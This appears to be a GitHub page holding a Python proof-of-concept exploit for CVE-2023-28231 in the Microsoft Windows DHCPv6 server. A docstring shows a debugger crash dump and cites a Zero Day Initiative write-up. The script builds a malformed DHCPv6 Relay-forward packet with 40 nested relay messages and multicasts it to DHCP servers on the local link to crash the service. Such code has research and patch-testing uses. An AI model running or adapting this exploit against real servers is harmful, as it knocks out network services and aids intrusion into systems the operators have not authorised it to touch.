-
Notifications
You must be signed in to change notification settings - Fork 6
/
CVE-2023-28231_poc.py
81 lines (70 loc) · 3.11 KB
/
CVE-2023-28231_poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
"""
Microsoft DHCPv6 Server - RelayForward
@w3bd3vil
0:024> r
rax=00000000ffff000c rbx=00000000000001a2 rcx=00000033ffcc0270
rdx=0000000000000000 rsi=00000000000001a2 rdi=00000138fba4c098
rip=00007ffa177aecc6 rsp=0000003179dffd00 rbp=0000000000000012
r8=0000000000000020 r9=0000000000000000 r10=0000000000000004
r11=0000000000000246 r12=000000000000059c r13=0000000000000002
r14=00000138fba4d48c r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
dhcpssvc!ProcessRelayForwardMessage+0x346:
00007ffa`177aecc6 4c398c396a060000 cmp qword ptr [rcx+rdi+66Ah],r9 ds:0000016c`fb70c972=????????????????
0:024> k
# Child-SP RetAddr Call Site
00 00000031`79dffd00 00007ffa`177ae4a3 dhcpssvc!ProcessRelayForwardMessage+0x346
01 00000031`79dffda0 00007ffa`177b16e7 dhcpssvc!DhcpV6ProcessMessage+0x187
02 00000031`79dffe00 00007ffa`1779cbd5 dhcpssvc!DhcpV6ProcessPacket+0x77
03 00000031`79dffe50 00007ffa`24c94de0 dhcpssvc!ProcessingLoop+0x1c5
04 00000031`79dffeb0 00007ffa`25cfe3db KERNEL32!BaseThreadInitThunk+0x10
05 00000031`79dffee0 00000000`00000000 ntdll!RtlUserThreadStart+0x2b
https://www.zerodayinitiative.com/blog/2023/5/1/cve-2023-28231-rce-in-the-microsoft-windows-dhcpv6-service
"""
import socket
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.bind(('2001:db8::f0c0:c671:3b26:e213', 547)) #LHOST
dest_addr = ('ff02::1:2', 547)
final_packet = b'\x0c' #Relay-forw
# dhcpssvc!ProcessRelayForwardMessage+0x103:
# 00007ffa`177aea83 807d0120 cmp byte ptr [rbp+1],20h ss:00000138`fba49ef1=21
final_packet += b'\x20'
final_packet += b'\x00'*16 #link-address
final_packet += b'\x00'*16 #peer-address
arre_packet = []
length_value = 0
for i in range(40):
if i == 0:
length_value += 40 + 4 + 56
else:
length_value += 40 + 4
hex_length_value = length_value.to_bytes(2, 'big')
# dhcpssvc!ProcessRelayForwardMessage+0x268:
# 00007ffa`177aebe8 0f859c010000 jne dhcpssvc!ProcessRelayForwardMessage+0x40a (00007ffa`177aed8a) [br=0]
if i <= 8:
hop_value = 0
else:
hop_value = i - 8
hop_value = hop_value.to_bytes(1, 'big')
packet = b''
packet += b'\x00\x09' #Relay Message
packet += hex_length_value
packet += b'\x0c' #Relay-forw
packet += hop_value
packet += b'\xff'*16 #link-address
packet += b'\xff'*16 #peer-address
packet += b'\x00\x12\x00\x02\x51\x80' #interface-id (probably not required)
if i == 0:
packet += b'\x00\x09' #Relay Message
packet += b'\x00\x38' #Length
packet += b'\x01\x91\xf7\xd9\x00\x01\x00\x0e\x00\x01\x00\x01\x2b\xe6\xb0\xc7\x56\x1f\xf0\x8f\x03\x85\x00\x06\x00' #SOLICIT
packet += b'\x08\x00\x17\x00\x18\x00\x27\x00\x1f\x00\x08\x00\x02\x00\x00\x00\x03\x00\x0c\x5d\x0b\xdd\x07\x00\x00' #SOLICIT
packet += b'\x0e\x10\x00\x00\x15\x18' #SOLICIT
#print(packet.hex())
arre_packet.append(packet)
#print(b''.join(arre_packet[::-1]).hex())
final_packet += b''.join(arre_packet[::-1])
s.sendto(final_packet, dest_addr)
print(f"Krash packet sent!")
s.close()